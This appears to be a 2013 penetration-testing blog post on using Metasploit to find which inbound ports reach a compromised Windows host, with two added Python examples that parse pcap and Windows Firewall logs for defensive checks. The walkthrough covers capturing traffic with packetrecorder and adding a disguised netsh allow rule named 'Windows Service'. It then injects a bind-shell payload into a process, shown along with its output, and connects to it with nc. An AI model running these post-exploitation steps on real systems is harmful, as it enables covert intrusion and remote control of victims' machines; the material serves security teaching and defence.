Friday, July 19, 2013

Metasploit: Getting Ingress firewall rules

This week Rapid7 announced the addition of MetaModules in Metasploit Pro v4.7. One of them, "Egress Firewall Testing", lets you deduce the outbound filtering rules enforced by firewalls/routers. No doubt this functionality is really useful, for example, if we want to leave a reverse shell pointing to our machine. To do this, the MetaModule "contacts to Rapid7-hosted server to test open ports and delivers the results in one easy report".

This module reminds me of a little trick I usually use to get just the opposite, that is, to infer ingress firewall rules. In fact, this post could be seen as the second part of the recent "Donde dejo mi bind shell" (in Spanish), but this time with the help of Metasploit.

As I said in that post, by knowing which of the victim host's ports are reachable from outside we can infer the inbound filtering rules (static inside NAT/PAT, ACLs, etc.) implemented in firewalls/routers, information that is really valuable if you plan to spawn a bind shell. Let's see this case.

We have a Meterpreter session and we want to run a bind shell. If we launch nmap from outside, we see that all ports are filtered or closed (except the ones already open). So, where do we leave the shell? Are those ports filtered by the external firewall, or maybe by local firewall software? At first I thought of writing a post-exploitation module to play with Windows Firewall logging (netsh advfirewall>set allprofiles logging droppedconnections enable), but later I realized that it would be better and easier to use packetrecorder. So, to know which packets reach the host from outside, we run:

meterpreter > run packetrecorder -i 2 -t 60
[*] Starting Packet capture on interface 2
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/USER-PC_20130720.1626/USER-PC_20130720.1626.cap
[*] Packet capture interval is 60 Seconds

and launch the scan again:

root@gotham:~# nmap -sS -p 21,23,100-200,3389,8080 -PN

Starting Nmap 6.00 ( ) at 2013-07-20 16:02 CEST
Nmap scan report for
Host is up (0.00055s latency).
All 105 scanned ports on are filtered
MAC Address: 08:00:27:6D:E7:88 (Cadmus Computer Systems)

With the .cap file, let's now list the ports that were reachable:

root@gotham:~/.msf4/logs/scripts/packetrecorder/USER-PC_20130720.1626# tshark -r USER-PC_20130720.1626.cap -R "ip.src ==" -T fields -e tcp.dstport | sort -u


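The tshark step above, reimplemented as an added Python example (this is not code from the original post): it parses a classic pcap file directly, with no external libraries, keeps only SYN-only segments sent from the scanner's address, and then splits the scanned port list into ports whose SYNs reached the host (so any "filtered" verdict seen from outside must come from the host firewall) and ports that never arrived (dropped upstream by the perimeter device, or with no NAT mapping). That same comparison is what an administrator uses to verify that perimeter filtering, and not only the host firewall, covers a port. The capture bytes, the addresses 198.51.100.9 (scanner) and 192.0.2.20 (target) and the port list are all constructed for the example.

```python
import struct

SCANNER_IP = "198.51.100.9"   # constructed: the external host running nmap
TARGET_IP = "192.0.2.20"      # constructed: the host where packetrecorder runs
SYN, ACK = 0x02, 0x10         # TCP flag bits


def _ip_bytes(dotted):
    return bytes(int(octet) for octet in dotted.split("."))


def build_tcp_frame(src_ip, dst_ip, sport, dport, flags):
    """Ethernet/IPv4/TCP frame with zeroed checksums; the parser never checks them."""
    eth = bytes.fromhex("0800276de788") + bytes.fromhex("001122334455") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     _ip_bytes(src_ip), _ip_bytes(dst_ip))
    return eth + ip + tcp


def pcap_record(frame, ts_sec=1374328921):
    """One little-endian pcap record header followed by the frame bytes."""
    return struct.pack("<IIII", ts_sec, 0, len(frame), len(frame)) + frame


# Constructed capture: classic pcap, little-endian, LINKTYPE_ETHERNET (1).
PCAP_GLOBAL_HEADER = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
SAMPLE_PCAP = PCAP_GLOBAL_HEADER + b"".join(pcap_record(build_tcp_frame(*args)) for args in [
    (SCANNER_IP, TARGET_IP, 40001, 21, SYN),
    (SCANNER_IP, TARGET_IP, 40002, 8080, SYN),
    ("203.0.113.7", TARGET_IP, 40003, 23, SYN),   # other source: must be ignored
    (SCANNER_IP, TARGET_IP, 40004, 443, ACK),     # not a connection attempt: ignored
    (SCANNER_IP, TARGET_IP, 40005, 3389, SYN),
])


def syn_dst_ports(pcap_bytes, scanner_ip):
    """Sorted destination ports of SYN-only TCP segments sent by scanner_ip."""
    magic = pcap_bytes[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled)")
    if struct.unpack(endian + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    ports, offset = set(), 24
    while offset + 16 <= len(pcap_bytes):
        incl_len = struct.unpack(endian + "IIII", pcap_bytes[offset:offset + 16])[2]
        frame = pcap_bytes[offset + 16:offset + 16 + incl_len]
        offset += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                      # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ihl < 20 or ip[9] != 6 or len(ip) < ihl + 14:
            continue                      # bad header, not TCP, or truncated before the flags
        if ".".join(str(b) for b in ip[12:16]) != scanner_ip:
            continue                      # not sent by the scanning host
        tcp = ip[ihl:]
        if tcp[13] & (SYN | ACK) == SYN:  # SYN set, ACK clear: an inbound connection attempt
            ports.add(struct.unpack("!H", tcp[2:4])[0])
    return sorted(ports)


def classify_scanned_ports(scanned_ports, reached_ports):
    """Ports reported 'filtered' from outside, split by where the drop actually happens."""
    reached = set(reached_ports)
    return {
        "filtered_locally": sorted(p for p in scanned_ports if p in reached),
        "filtered_upstream": sorted(p for p in scanned_ports if p not in reached),
    }


if __name__ == "__main__":
    scanned = [21, 23, 3389, 8080]        # constructed subset of the nmap port list
    reached = syn_dst_ports(SAMPLE_PCAP, SCANNER_IP)
    print("SYNs that reached the host:", reached)
    print(classify_scanned_ports(scanned, reached))
```

Only SYN-without-ACK segments count, so replies from the host and unrelated traffic to the interface do not pollute the result; a port in "filtered_upstream" is one where the perimeter device is doing its job, a port in "filtered_locally" is protected by the host firewall alone.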
Nice: the SYNs to those ports reached the host's interface, so we now know that the filtering comes from the Windows Firewall and not from the external router/firewall. We just need to allow one of these ports and run the bind shell:

meterpreter > shell
Process 2888 created.
Channel 1 created.
Microsoft Windows [Versión 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Users\User\Desktop>netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow protocol=TCP localport=8080
netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow protocol=TCP localport=8080


meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/shell_bind_tcp LPORT=8080 LHOST=

[*] Running module against USER-PC
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Command Shell, Bind TCP Inline into process ID 3456
[*] Opening process 3456
[*] Generating payload
[*] Allocating memory in procees 3456
[*] Allocated memory at address 0x003d0000, for 341 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 3456

meterpreter > netstat -h

Connection list

    Proto  Local address       Remote address     State        User  Inode  PID/Program name
    -----  -------------       --------------     -----        ----  -----  ----------------
    tcp*          LISTEN       0     0      700/svchost.exe
    tcp*          LISTEN       0     0      4/System

    tcp*          LISTEN       0     0      3456/notepad.exe

meterpreter > exit -y

[*] Shutting down Meterpreter...

[*] - Meterpreter session 1 closed.  Reason: User exit

msf post(payload_inject) > exit

root@gotham:~#  nc 8080
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usuario\Escritorio>
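The defender-side counterpart: the first idea mentioned above, enabling Windows Firewall logging of dropped connections, writes %systemroot%\system32\LogFiles\Firewall\pfirewall.log, and reading that log shows the same picture from the inside (which inbound SYNs the host firewall itself dropped). If logging of allowed connections is also on (netsh advfirewall set allprofiles logging allowedconnections enable), the log also records the effect of an added allow rule like the one above. The following Python is an added example, not code from the post: it parses the log using its own #Fields header, lists the dropped inbound ports per source, flags a source that hits several distinct ports within a short window (what the nmap run looks like from the host), and reports any port that was dropped at first and allowed later, which is the trace a newly added inbound allow rule leaves. The log lines, addresses and timestamps are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed pfirewall.log excerpt; the "#Fields:" header names the columns.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2013-07-20 16:02:01 DROP TCP 198.51.100.9 192.0.2.20 40001 21 52 S 1234567 0 8192 - - - RECEIVE
2013-07-20 16:02:01 DROP TCP 198.51.100.9 192.0.2.20 40002 23 52 S 1234568 0 8192 - - - RECEIVE
2013-07-20 16:02:02 DROP TCP 198.51.100.9 192.0.2.20 40003 3389 52 S 1234569 0 8192 - - - RECEIVE
2013-07-20 16:02:02 DROP TCP 198.51.100.9 192.0.2.20 40004 8080 52 S 1234570 0 8192 - - - RECEIVE
2013-07-20 16:02:03 DROP UDP 203.0.113.7 192.0.2.20 5353 5353 100 - - - - - - - RECEIVE
2013-07-20 16:30:11 ALLOW TCP 198.51.100.9 192.0.2.20 40009 8080 52 S 1234999 0 8192 - - - RECEIVE
"""


def parse_firewall_log(text):
    """Parse pfirewall.log text into dicts keyed by the names in its #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                      # malformed line: skip rather than misalign columns
        rec = dict(zip(fields, values))
        rec["timestamp"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def inbound(records, action):
    """Records with the given action (DROP/ALLOW) on the receive path only."""
    return [r for r in records if r["action"] == action and r["path"] == "RECEIVE"]


def dropped_inbound_ports(records, protocol="TCP"):
    """Per source IP, the sorted destination ports the host firewall dropped on receive."""
    by_src = defaultdict(set)
    for r in inbound(records, "DROP"):
        if r["protocol"] == protocol:
            by_src[r["src-ip"]].add(int(r["dst-port"]))
    return {src: sorted(ports) for src, ports in by_src.items()}


def detect_port_scans(records, min_ports=3, window=timedelta(seconds=60)):
    """Sources whose dropped inbound attempts hit >= min_ports distinct ports within window."""
    events = defaultdict(list)
    for r in inbound(records, "DROP"):
        events[r["src-ip"]].append((r["timestamp"], int(r["dst-port"])))
    alerts = {}
    for src, hits in events.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            ports = {port for ts, port in hits[i:] if ts - start <= window}
            if len(ports) >= min_ports:
                alerts[src] = sorted(ports)
                break
    return alerts


def dropped_then_allowed_ports(records):
    """Inbound ports dropped at some point and allowed later: evidence of a rule change."""
    first_drop = {}
    for r in inbound(records, "DROP"):
        port, ts = int(r["dst-port"]), r["timestamp"]
        first_drop[port] = min(first_drop.get(port, ts), ts)
    later_allow = {int(r["dst-port"]) for r in inbound(records, "ALLOW")
                   if int(r["dst-port"]) in first_drop
                   and r["timestamp"] > first_drop[int(r["dst-port"])]}
    return sorted(later_allow)


if __name__ == "__main__":
    recs = parse_firewall_log(SAMPLE_LOG)
    print("dropped inbound TCP ports by source:", dropped_inbound_ports(recs))
    print("probable scans:", detect_port_scans(recs))
    print("ports dropped, then allowed:", dropped_then_allowed_ports(recs))
```

The scan heuristic is deliberately simple (distinct destination ports from one source inside a sliding window); the drop-then-allow check is the cheap signal that an inbound rule changed, which is worth correlating with the firewall rule-change events in the Security log rather than trusting on its own.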
